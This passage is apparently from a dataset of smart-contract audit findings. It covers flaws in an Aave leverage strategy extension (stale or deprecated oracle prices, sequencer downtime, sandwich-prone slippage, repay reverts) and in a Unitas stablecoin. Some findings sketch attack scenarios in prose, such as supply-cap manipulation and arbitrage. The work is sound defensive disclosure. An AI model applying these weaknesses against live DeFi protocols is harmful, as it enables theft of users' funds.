The result is that if the `borrowValue` ever exceeds `liquidationThreshold * (1 - unutilizedLeveragPercentage)` then all attempts to repay will revert.\\nAaveLeverageStrategyExtension.sol#L1110-L1118\\n```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n\\nWhen calculating `netRepayLimit`, `_calculateMaxBorrowCollateral` uses the `liquidationThreshold` adjusted by `unutilizedLeveragePercentage`. It then subtracts the borrow value from this limit. This is problematic because if the current `borrowValue` of the set token exceeds `liquidationThreshold` * (1 - unutilizedLeveragPercentage) then this line will revert making it impossible to make any kind of repayment. Once no repayment is possible the set token can't rebalance and will be liquidated.чDon't adjust the max value by `unutilizedLeveragPercentage`чOnce the leverage exceeds a certain point the set token can no longer rebalanceч```\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n```\\n -setIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at AaveчmediumчsetIncentiveSettings would be halt during a rebalance operation that gets stuck due to supply cap is reached at Aave\\nrebalance implement a cap of tradeSize and if the need to rebalance require taking more assets than the maxTradeSize, then `twapLeverageRatio` would be set to the targeted leverage. 
`twapLeverageRatio` == 0 is required during rebalance.\\nConsider:\\nlever is needed during rebalance, the strategy require to borrow more ETH and sell to wstETH during the 1st call of rebalance the protocol cache the new `twapLeverageRatio` However wstETH market in Aave reach supply cap. rebalance/iterateRebalance comes to a halt. `twapLeverageRatio` remains caching the targeted leverage\\nsetIncentiveSettings requires a condition in which no rebalance is in progress. With the above case, setIncentiveSettings can be halted for an extended period of time until the wstETH market falls under supply cap.\\nWorth-noting, at the time of writing this issue, the wstETH market at Aave has been at supply cap\\nIn this case, malicious actor who already has a position in wstETH can do the following:\\ndeposit into the setToken, trigger a rebalance.\\nmalicious trader withdraw his/her position in Aave wstETH market so there opens up vacancy for supply again.\\nprotocol owner see supply vacancy, call rebalance in order to lever as required. Now twapLeverageRatio is set to new value since multiple trades are needed\\nmalicious trader now re-supply the wstETH market at Aave so it reaches supply cap again.\\nthe protocol gets stuck with a non-zero twapLeverageRatio, `setIncentiveSettings` can not be called.\\n```\\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator noRebalanceInProgress {\\n incentive = _newIncentiveSettings;\\n\\n _validateNonExchangeSettings(methodology, execution, incentive);\\n\\n emit IncentiveSettingsUpdated(\\n incentive.etherReward,\\n incentive.incentivizedLeverageRatio,\\n incentive.incentivizedSlippageTolerance,\\n incentive.incentivizedTwapCooldownPeriod\\n );\\n }\\n```\\nчAdd some checks on whether the supply cap of an Aave market is reached during a rebalance. 
If so, allow a re-set of twapLeverageRatioчsetIncentiveSettings would be halted.ч```\\n function setIncentiveSettings(IncentiveSettings memory _newIncentiveSettings) external onlyOperator noRebalanceInProgress {\\n incentive = _newIncentiveSettings;\\n\\n _validateNonExchangeSettings(methodology, execution, incentive);\\n\\n emit IncentiveSettingsUpdated(\\n incentive.etherReward,\\n incentive.incentivizedLeverageRatio,\\n incentive.incentivizedSlippageTolerance,\\n incentive.incentivizedTwapCooldownPeriod\\n );\\n }\\n```\\n -Protocol doesn't completely protect itself from `LTV = 0` tokensчmediumчThe AaveLeverageStrategyExtension does not completely protect against tokens with a Loan-to-Value (LTV) of 0. Tokens with an LTV of 0 in Aave V3 pose significant risks, as they cannot be used as collateral to borrow upon a breaking withdraw. Moreover, LTVs of assets could be set to 0; even though they currently aren't, this could create substantial problems with potential disruption of multiple functionalities. This bug could cause a Denial-of-Service (DoS) situation in some cases, and has the potential to impact the borrowing logic in the protocol, leading to an unintentionally large perceived borrowing limit.\\nWhen an AToken has LTV = 0, Aave restricts the usage of certain operations.
Specifically, if a user owns at least one AToken as collateral with an LTV = 0, certain operations could revert:\\nWithdraw: If the asset being withdrawn is collateral and the user is borrowing something, the operation will revert if the withdrawn collateral is an AToken with LTV > 0.\\nTransfer: If the asset being transferred is an AToken with LTV > 0 and the sender is using the asset as collateral and is borrowing something, the operation will revert.\\nSet the reserve of an AToken as non-collateral: If the AToken being set as non-collateral is an AToken with LTV > 0, the operation will revert.\\nTake a look at AaveLeverageStrategyExtension.sol#L1050-L1119\\n```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. 
This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. 
LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n\\nApart from the aforementioned issue with `LTV = 0` tokens, there's another issue with the `_calculateMaxBorrowCollateral()` function. When `LTV = 0`, `maxLtvRaw` also equals 0, leading to a `netBorrowLimit` of 0. When the borrowing value is subtracted from this, it results in an underflow, causing the borrowing limit to appear incredibly large. This essentially breaks the borrowing logic of the protocol.чThe protocol should consider implementing additional protections against tokens with an LTV of 0.чThis bug could potentially disrupt the entire borrowing logic within the protocol by inflating the perceived borrowing limit. This could lead to users borrowing an unlimited amount of assets due to the underflow error. 
In extreme cases, this could lead to a potential loss of user funds or even a complete protocol shutdown, thus impacting user trust and the overall functionality of the protocol.ч```\\n /**\\n * Calculate total notional rebalance quantity and chunked rebalance quantity in collateral units.\\n *\\n * return uint256 Chunked rebalance notional in collateral units\\n * return uint256 Total rebalance notional in collateral units\\n */\\n function _calculateChunkRebalanceNotional(\\n LeverageInfo memory _leverageInfo,\\n uint256 _newLeverageRatio,\\n bool _isLever\\n )\\n internal\\n view\\n returns (uint256, uint256)\\n {\\n // Calculate absolute value of difference between new and current leverage ratio\\n uint256 leverageRatioDifference = _isLever ? _newLeverageRatio.sub(_leverageInfo.currentLeverageRatio) : _leverageInfo.currentLeverageRatio.sub(_newLeverageRatio);\\n\\n uint256 totalRebalanceNotional = leverageRatioDifference.preciseDiv(_leverageInfo.currentLeverageRatio).preciseMul(_leverageInfo.action.collateralBalance);\\n\\n uint256 maxBorrow = _calculateMaxBorrowCollateral(_leverageInfo.action, _isLever);\\n\\n uint256 chunkRebalanceNotional = Math.min(Math.min(maxBorrow, totalRebalanceNotional), _leverageInfo.twapMaxTradeSize);\\n\\n return (chunkRebalanceNotional, totalRebalanceNotional);\\n }\\n\\n /**\\n * Calculate the max borrow / repay amount allowed in base units for lever / delever. 
This is due to overcollateralization requirements on\\n * assets deposited in lending protocols for borrowing.\\n *\\n * For lever, max borrow is calculated as:\\n * (Net borrow limit in USD - existing borrow value in USD) / collateral asset price adjusted for decimals\\n *\\n * For delever, max repay is calculated as:\\n * Collateral balance in base units * (net borrow limit in USD - existing borrow value in USD) / net borrow limit in USD\\n *\\n * Net borrow limit for levering is calculated as:\\n * The collateral value in USD * Aave collateral factor * (1 - unutilized leverage %)\\n *\\n * Net repay limit for delevering is calculated as:\\n * The collateral value in USD * Aave liquiditon threshold * (1 - unutilized leverage %)\\n *\\n * return uint256 Max borrow notional denominated in collateral asset\\n */\\n function _calculateMaxBorrowCollateral(ActionInfo memory _actionInfo, bool _isLever) internal view returns(uint256) {\\n\\n // Retrieve collateral factor and liquidation threshold for the collateral asset in precise units (1e16 = 1%)\\n ( , uint256 maxLtvRaw, uint256 liquidationThresholdRaw, , , , , , ,) = strategy.aaveProtocolDataProvider.getReserveConfigurationData(address(strategy.collateralAsset));\\n\\n // Normalize LTV and liquidation threshold to precise units. 
LTV is measured in 4 decimals in Aave which is why we must multiply by 1e14\\n // for example ETH has an LTV value of 8000 which represents 80%\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue))\\n .preciseDiv(netRepayLimit);\\n }\\n }\\n```\\n -no validation to ensure the arbitrum sequencer is downчmediumчThere is no validation to ensure sequencer is down\\n```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n\\nUsing Chainlink in L2 chains such as Arbitrum requires to check if the sequencer is down to avoid prices from looking like they are fresh although they are not.\\nThe bug could be leveraged by malicious actors to take advantage of the sequencer downtime.чrecommend to add checks to ensure the sequencer is not down.чwhen sequencer is down, stale price is used for oracle and the borrow value and collateral value is calculated and the protocol can be forced to rebalance in a loss positionч```\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** 
strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n```\\n -Relying solely on oracle-based slippage parameters can cause significant loss due to sandwich attacksчmediumчAaveLeverageStrategyExtension relies solely on oracle price data when determining the slippage parameter during a rebalance. This is problematic as chainlink oracles, especially mainnet, have upwards of a 2% threshold before triggering a price update. If swapping between volatile assets, the errors will compound causing even bigger variation. These variations can be exploited via sandwich attacks.\\nAaveLeverageStrategyExtension.sol#L1147-L1152\\n```\\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\\n return _collateralRebalanceUnits\\n .preciseMul(_actionInfo.collateralPrice)\\n .preciseDiv(_actionInfo.borrowPrice)\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\\n}\\n```\\n\\nWhen determining the minimum return from the swap, _calculateMinRepayUnits directly uses oracle data to determine the final output. The differences between the true value and the oracle value can be systematically exploited via sandwich attacks. Given the leverage nature of the module, these losses can cause significant loss to the pool.чThe solution to this is straightforward. Allow keepers to specify their own slippage value. Instead of using an oracle slippage parameter, validate that the specified slippage value is within a margin of the oracle. This gives the best of both worlds.
It allows for tighter and more reactive slippage controls while still preventing outright abuse in the event that the trusted keeper is compromised.чPurely oracle derived slippage parameters will lead to significant and unnecessary lossesч```\\nfunction _calculateMinRepayUnits(uint256 _collateralRebalanceUnits, uint256 _slippageTolerance, ActionInfo memory _actionInfo) internal pure returns (uint256) {\\n return _collateralRebalanceUnits\\n .preciseMul(_actionInfo.collateralPrice)\\n .preciseDiv(_actionInfo.borrowPrice)\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(_slippageTolerance));\\n}\\n```\\n -Chainlink price feed is `deprecated`, not sufficiently validated and can return `stale` prices.чmediumчThe function `_createActionInfo()` uses Chainlink's deprecated latestAnswer function, this function also does not guarantee that the price returned by the Chainlink price feed is not stale and there is no additional checks to ensure that the return values are valid.\\nThe internal function `_createActionInfo()` uses calls `strategy.collateralPriceOracle.latestAnswer()` and `strategy.borrowPriceOracle.latestAnswer()` that uses Chainlink's deprecated latestAnswer() to get the latest price. However, there is no check for if the return value is a stale data.\\n```\\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\\n ActionInfo memory rebalanceInfo;\\n\\n // Calculate prices from chainlink. 
Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\nчThe `latestRoundData` function should be used instead of the deprecated `latestAnswer` function and add sufficient checks to ensure that the pricefeed is not stale.\\n```\\n(uint80 roundId, int256 assetChainlinkPriceInt, , uint256 updatedAt, uint80 answeredInRound) = IPrice(_chainlinkFeed).latestRoundData();\\n require(answeredInRound >= roundId, \"price is stale\");\\n require(updatedAt > 0, \"round is incomplete\");\\n```\\nчThe function `_createActionInfo()` is used to return important values used throughout the contract, the staleness of the chainlinklink return values will lead to wrong calculation of the collateral and borrow prices and other unexpected behavior.ч```\\nfunction _createActionInfo() internal view returns(ActionInfo memory) {\\n ActionInfo memory rebalanceInfo;\\n\\n // Calculate prices from chainlink. 
Chainlink returns prices with 8 decimal places, but we need 36 - underlyingDecimals decimal places.\\n // This is so that when the underlying amount is multiplied by the received price, the collateral valuation is normalized to 36 decimals.\\n // To perform this adjustment, we multiply by 10^(36 - 8 - underlyingDecimals)\\n int256 rawCollateralPrice = strategy.collateralPriceOracle.latestAnswer();\\n rebalanceInfo.collateralPrice = rawCollateralPrice.toUint256().mul(10 ** strategy.collateralDecimalAdjustment);\\n int256 rawBorrowPrice = strategy.borrowPriceOracle.latestAnswer();\\n rebalanceInfo.borrowPrice = rawBorrowPrice.toUint256().mul(10 ** strategy.borrowDecimalAdjustment);\\n// More Code// rest of code.\\n}\\n \\n```\\n -The protocol is not compatible with tokens such as USDT because of the Approval Race ProtectionчmediumчThe protocol is not compatible with tokens such as USDT because of the Approval Race Protection\\nthe protocol is intended to interact with any ERC20 token and USDT is a common one\\nQ: Which ERC20 tokens do you expect will interact with the smart contracts?
The protocol expects to interact with any ERC20.\\nIndividual SetToken's should only interact with ERC20 chosen by the SetToken manager.\\nwhen doing the deleverage\\nfirst, we construct the deleverInfo\\n```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n\\nthen we withdraw from the lending pool, execute trade and repay the borrow token\\n```\\n_withdraw(deleverInfo.setToken, deleverInfo.lendingPool, _collateralAsset, deleverInfo.notionalSendQuantity);\\n\\n uint256 postTradeReceiveQuantity = _executeTrade(deleverInfo, _collateralAsset, _repayAsset, _tradeData);\\n\\n uint256 protocolFee = _accrueProtocolFee(_setToken, _repayAsset, postTradeReceiveQuantity);\\n\\n uint256 repayQuantity = postTradeReceiveQuantity.sub(protocolFee);\\n\\n _repayBorrow(deleverInfo.setToken, deleverInfo.lendingPool, _repayAsset, repayQuantity);\\n```\\n\\nthis is calling _repayBorrow\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe trade received (quantity - the protocol fee) is used to repay the debt\\nbut the required debt to be required is the (borrowed amount + the interest rate)\\nsuppose the only debt that needs to be repayed is 1000 USDT\\ntrade received (quantity - the protocol) fee is 20000 USDT\\nonly 1000 USDT is used to repay the debt\\nbecause when repaying, the paybackAmount is only the debt amount\\n```\\nuint256 paybackAmount = params.interestRateMode == DataTypes.InterestRateMode.STABLE\\n ? 
stableDebt\\n : variableDebt;\\n```\\n\\nthen when burning the variable debt token\\n```\\nreserveCache.nextScaledVariableDebt = IVariableDebtToken(\\n reserveCache.variableDebtTokenAddress\\n ).burn(params.onBehalfOf, paybackAmount, reserveCache.nextVariableBorrowIndex);\\n```\\n\\nonly the \"payback amount\", which is 1000 USDT is transferred to pay the debt,\\nthe excessive leftover amount is (20000 USDT - 1000 USDT) = 19000 USDT\\nbut if we lookback into the repayBack function\\n```\\n/**\\n * @dev Invoke repay from SetToken using AaveV2 library. Burns DebtTokens for SetToken.\\n */\\nfunction _repayBorrow(ISetToken _setToken, ILendingPool _lendingPool, IERC20 _asset, uint256 _notionalQuantity) internal {\\n _setToken.invokeApprove(address(_asset), address(_lendingPool), _notionalQuantity);\\n _setToken.invokeRepay(_lendingPool, address(_asset), _notionalQuantity, BORROW_RATE_MODE);\\n}\\n```\\n\\nthe approved amount is 20000 USDT, but only 1000 USDT approval limit is used, we have 19000 USDT approval limit left\\naccording to\\nSome tokens (e.g. OpenZeppelin) will revert if trying to approve the zero address to spend tokens (i.e. 
a call to approve(address(0), amt)).\\nIntegrators may need to add special cases to handle this logic if working with such a token.\\nUSDT is such a token that is subject to the approval race condition; without approving 0 first, the second approve after the first repay will revertчApprove 0 firstчThe second and following repay borrows will revert if the ERC20 token is subject to the approval race conditionч```\\nActionInfo memory deleverInfo = _createAndValidateActionInfo(\\n _setToken,\\n _collateralAsset,\\n _repayAsset,\\n _redeemQuantityUnits,\\n _minRepayQuantityUnits,\\n _tradeAdapterName,\\n false\\n );\\n```\\n -Operator is blocked when sequencer is down on ArbitrumчmediumчWhen the sequencer is down on Arbitrum state changes can still happen on L2 by passing them from L1 through the Delayed Inbox.\\nUsers can still interact with the Index protocol but due to how Arbitrum address aliasing functions the operator will be blocked from calling onlyOperator().\\nThe `msg.sender` of a transaction from the Delayed Inbox is aliased:\\n```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n\\nAll functions with the `onlyOperator()` modifier are therefore blocked when the sequencer is down.\\nThe issue exists for all modifiers that are only callable by specific EOAs. But the operator of the Aave3LeverageStrategyExtension is the main security risk.чChange the `onlyOperator()` to check if the address is the aliased address of the operator.чThe operator has roles that are vital for the safety of the protocol. Re-balancing and issuing/redeeming can still be done when the sequencer is down; it is therefore important that the operator call the necessary functions to operate the protocol when the sequencer is down.\\n`disengage()` is an important safety function that the operator should always have access to, especially when the protocol is still accessible to other users.
Changing methodology and adding/removing exchanges are also important for the safety of the protocol.ч```\\nL2_Alias = L1_Contract_Address + 0x1111000000000000000000000000000000001111\\n```\\n -Oracle Price miss matched when E-mode uses single oracleчmediumчAAVE3 can turn on single oracle use on any E-mode category. When that is done collateral and the borrowed assets will be valued based on a single oracle price. When this is done the prices used in AaveLeverageStrategyExtension can differ from those used internally in AAVE3.\\nThis can lead to an increased risk of liquidation and failures to re-balance properly.\\nThere is currently no accounting for single oracle use in the AaveLeverageStragyExtension, if AAVE3 turns it on the extension will simply continue using its current oracles without accounting for the different prices.\\nWhen re-balancing the following code calculate the netBorrowLimit/netRepayLimit:\\n```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n\\nThe `_actionInfo.collateralValue` and `_adminInfo.borrowValue` are `_getAndValidateLeverageInfo()` where they are both retrieved based on the current set chainlink oracle.\\nWhen E-mode uses a single oracle price a de-pegging of one of the assets will lead to incorrect values of `netBorrowLimit` and `netRepayLimit` depending on which asset is de-pegging.\\n`collateralValue` or `borrowValue` 
can be either larger or smaller than how they are valued internally in AAVE3.чAave3LeverageStrategyExtension should take single oracle usage into account. `_calcualteMaxBorrowCollateral` should check if there is a discrepancy and adjust such that the `execute.unutilizedLeveragePercentage` safety parameter is honored.чWhen Levering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nThe `netBorrowLimit` is larger than it should be we are essentially going to overriding `execute.unutilizedLeveragePercentage` and attempting to borrow more than we should.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nThe `netBorrowLimit` is smaller than it should be, we are not borrowing as much as we should. Levering up takes longer.\\nWhen Delevering\\nIf `collateralValue` is to valued higher than internally in AAVE3 OR If `borrowValue` is to valued lower than internally in AAVE3:\\nWe will withdraw more collateral and repay more than specified by `execution.unutilizedLeveragePercentage`.\\nIf `collateralValue` is valued lower than internally in AAVE3 OR If `borrowValue` is to valued higher than internally in AAVE3:\\nWe withdraw less and repay less debt than we should. This means that both `ripcord()` and `disengage()` are not functioning as they, they will not delever as fast they should. We can look at it as `execution.unutilizedLeveragePercentage` not being throttled.\\nThe above consequences show that important functionality is not working as expected. 
\"overriding\" `execution.unutilizedLeveragePercentage` is a serious safety concern.ч```\\n if (_isLever) {\\n uint256 netBorrowLimit = _actionInfo.collateralValue\\n .preciseMul(maxLtvRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return netBorrowLimit\\n .sub(_actionInfo.borrowValue)\\n .preciseDiv(_actionInfo.collateralPrice);\\n } else {\\n uint256 netRepayLimit = _actionInfo.collateralValue\\n .preciseMul(liquidationThresholdRaw.mul(10 ** 14))\\n .preciseMul(PreciseUnitMath.preciseUnit().sub(execution.unutilizedLeveragePercentage));\\n\\n return _actionInfo.collateralBalance\\n .preciseMul(netRepayLimit.sub(_actionInfo.borrowValue)) \\n .preciseDiv(netRepayLimit);\\n \\n```\\n -In case the portfolio makes a loss, the total reserves and reserve ratio will be inflated.чmediumчThe pool balance is transferred to the portfolio for investment, for example sending USDT to Curve/Aave/Balancer etc. to generate yield. However, there are risks associated with those protocols such as smart contract risks. In case a loss happens, it will not be reflected in the pool balance and the total reserve and reserve ratio will be inflated.\\nThe assets in the pool can be sent to the portfolio account to invest and earn yield. The amount of assets in the insurance pool and Unitas pool is tracked by the `_balance` variable. This amount is used to calculate the total reserve and total collateral, which then are used to calculate the reserve ratio.\\n```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n\\nWhen there is a loss to the portfolio, there is no way to write down the `_balance` variable. This leads to an overstatement of the total reserve and reserve ratio.чAdd function to allow admin to write off the `_balance` in case of investment lost. 
Example:\\n```\\nfunction writeOff(address token, uint256 amount) external onlyGuardian {\\n\\n uint256 currentBalance = IERC20(token).balanceOf(address(this));\\n\\n // Require that the amount to write off is less than or equal to the current balance\\n require(amount <= currentBalance, \"Amount exceeds balance\");\\n _balance[token] -= amount;\\n\\n emit WriteOff(token, amount);\\n}\\n```\\nчOverstatement of the total reserve and reserve ratio can increase the risk for the protocol because of undercollateralization of assets.ч```\\n uint256 tokenReserve = _getBalance(token);\\n uint256 tokenCollateral = IInsurancePool(insurancePool).getCollateral(token);\\n```\\n -USD1 is priced as $1 instead of being pegged to USDTчmediumчThe system treats 1 USD1 = $1 instead of 1 USD1 = 1 USDT which allows arbitrage opportunities.\\nTo swap from one token to another Unitas first get's the price of the quote token and then calculates the swap result. Given that we want to swap 1 USD1 for USDT, we have USDT as the quote token:\\n```\\n address priceQuoteToken = _getPriceQuoteToken(tokenIn, tokenOut);\\n price = oracle.getLatestPrice(priceQuoteToken);\\n _checkPrice(priceQuoteToken, price);\\n\\n feeNumerator = isBuy ? pair.buyFee : pair.sellFee;\\n feeToken = IERC20Token(priceQuoteToken == tokenIn ? 
tokenOut : tokenIn);\\n\\n SwapRequest memory request;\\n request.tokenIn = tokenIn;\\n request.tokenOut = tokenOut;\\n request.amountType = amountType;\\n request.amount = amount;\\n request.feeNumerator = feeNumerator;\\n request.feeBase = tokenManager.SWAP_FEE_BASE();\\n request.feeToken = address(feeToken);\\n request.price = price;\\n request.priceBase = 10 ** oracle.decimals();\\n request.quoteToken = priceQuoteToken;\\n\\n (amountIn, amountOut, fee) = _calculateSwapResult(request);\\n```\\n\\nSince `amountType == AmountType.In`, it executes _calculateSwapResultByAmountIn():\\n```\\n // When tokenOut is feeToken, subtracts the fee after converting the amount\\n amountOut = _convert(\\n request.tokenIn,\\n request.tokenOut,\\n amountIn,\\n MathUpgradeable.Rounding.Down,\\n request.price,\\n request.priceBase,\\n request.quoteToken\\n );\\n fee = _getFeeByAmountWithFee(amountOut, request.feeNumerator, request.feeBase);\\n amountOut -= fee;\\n```\\n\\nGiven that the price is 0.99e18, i.e. 1 USDT is worth $0.99, it calculates the amount of USDT we should receive as:\\n```\\n function _convertByFromPrice(\\n address fromToken,\\n address toToken,\\n uint256 fromAmount,\\n MathUpgradeable.Rounding rounding,\\n uint256 price,\\n uint256 priceBase\\n ) internal view virtual returns (uint256) {\\n uint256 fromBase = 10 ** IERC20Metadata(fromToken).decimals();\\n uint256 toBase = 10 ** IERC20Metadata(toToken).decimals();\\n\\n return fromAmount.mulDiv(price * toBase, priceBase * fromBase, rounding);\\n }\\n```\\n\\nGiven that:\\ntoBase = 10**6 = 1e6 (USDT has 6 decimals)\\nfromBase = 10**18 = 1e18 (USD1 has 18 decimals)\\npriceBase = 1e18\\nprice = 0.99e18 (1 USDT = $0.99)\\nfromAmount = 1e18 (we swap 1 USD1) we get: $1e18 * 0.99e18 * 1e6 / (1e18 * 1e18) = 0.99e6$\\nSo by redeeming 1 USD1 I only get back 0.99 USDT. 
